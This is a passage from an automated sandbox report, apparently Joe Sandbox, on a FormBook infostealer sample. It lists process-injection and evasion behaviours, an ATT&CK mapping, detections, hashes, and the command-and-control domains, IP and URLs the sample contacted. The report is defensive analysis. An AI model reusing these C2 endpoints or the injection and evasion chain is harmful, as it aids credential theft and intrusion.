          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 452425 Sample: 6KdTCZit4e.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 4 other signatures 2->42 10 6KdTCZit4e.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\6KdTCZit4e.exe.log, ASCII 10->28 dropped 54 Tries to detect virtualization through RDTSC time measurements 10->54 56 Injects a PE file into a foreign processes 10->56 14 6KdTCZit4e.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 seahorseblast.net 195.133.60.76, 49763, 80 INTENPL Russian Federation 17->30 32 www.thedreamcertificate.com 17->32 34 2 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses netstat to query active network connections and open ports 17->46 21 NETSTAT.EXE 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          6KdTCZit4e.exe39%VirustotalBrowse
          6KdTCZit4e.exe20%ReversingLabsByteCode-MSIL.Trojan.Taskun

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.6KdTCZit4e.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          seahorseblast.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.xboxleaders.com/api/profile.json?gamertag=0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.xboxleaders.com/api/friends.json?gamertag=0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.thedreamcertificate.com/kkt/?ibQh=6llLiJzHhP5P5Lj&I48l2h=L0B8w9HUZaOZ7jw4+npXJ0F94zqPsX3Vt6n0qHR8lA3J0yAUFnvUFF5QUXy5W701wjCn0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.seahorseblast.net/kkt/?I48l2h=JgCZg0ECNQCGdZh+l8D79i0V4/Xiha033Hwln1gAEXgZOLyx1jBrHFXC3spPC1oi0umv&ibQh=6llLiJzHhP5P5Lj0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.hometowncashbuyersgroup.com/kkt/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          seahorseblast.net
          		195.133.60.76
          		truetrueunknown
          thedreamcertificate.com
          		34.102.136.180
          		truefalse
            		unknown
            www.thedreamcertificate.com
            		unknown
            		unknowntrue
              		unknown
              www.seahorseblast.net
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.thedreamcertificate.com/kkt/?ibQh=6llLiJzHhP5P5Lj&I48l2h=L0B8w9HUZaOZ7jw4+npXJ0F94zqPsX3Vt6n0qHR8lA3J0yAUFnvUFF5QUXy5W701wjCnfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.seahorseblast.net/kkt/?I48l2h=JgCZg0ECNQCGdZh+l8D79i0V4/Xiha033Hwln1gAEXgZOLyx1jBrHFXC3spPC1oi0umv&ibQh=6llLiJzHhP5P5Ljtrue
                • Avira URL Cloud: safe
                		unknown
                www.hometowncashbuyersgroup.com/kkt/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.xboxleaders.com/api/profile.json?gamertag=6KdTCZit4e.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                          		high
                          http://www.xboxleaders.com/api/friends.json?gamertag=6KdTCZit4e.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.goodfont.co.krexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.%s.comPAexplorer.exe, 00000008.00000000.767736283.0000000002B50000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  http://www.fonts.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sakkal.comexplorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    34.102.136.180
                                    		thedreamcertificate.comUnited States
                                    		15169GOOGLEUSfalse
                                    195.133.60.76
                                    		seahorseblast.netRussian Federation
                                    		43962INTENPLtrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:452425
                                    Start date:22.07.2021
                                    Start time:10:32:07
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 52s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:6KdTCZit4e.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/1@2/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 23% (good quality ratio 20%)
                                    • Quality average: 71.7%
                                    • Quality standard deviation: 33.3%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.43.193.48, 20.82.210.154, 23.211.5.146, 23.211.6.115, 52.255.188.83, 52.147.198.201, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                    • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    10:33:29API Interceptor2x Sleep call for process: 6KdTCZit4e.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASN

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6KdTCZit4e.exe.log
                                    Process:C:\Users\user\Desktop\6KdTCZit4e.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1314
                                    Entropy (8bit):5.350128552078965
                                    Encrypted:false
                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.053978468118995
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:6KdTCZit4e.exe
                                    File size:1148416
                                    MD5:ed43ff447cd5486610731a627a930607
                                    SHA1:91449c85fb2fa5d27f8db3c8c08cdfb9d3287162
                                    SHA256:91cdb947644a5a802adac7583a79e7e560da38839489a02e7464730ff66fd004
                                    SHA512:3bd5692c8b81221a2b1e83b17b36872fc664935ed14d6d645dd0efa6e2725c0c95598e4871b358092fbb406e8eb4600face90aa1b98fe5720fd4629ff2903a1d
                                    SSDEEP:24576:pYxySdkFS+W/MMQM/3xu+ECDacAQahp6:ShdnrMpJUDO
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..j..........J.... ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:ae53d212d9ccc4ca

                                    Static PE Info

                                    General

                                    Entrypoint:0x51894a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x60F799AA [Wed Jul 21 03:51:06 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
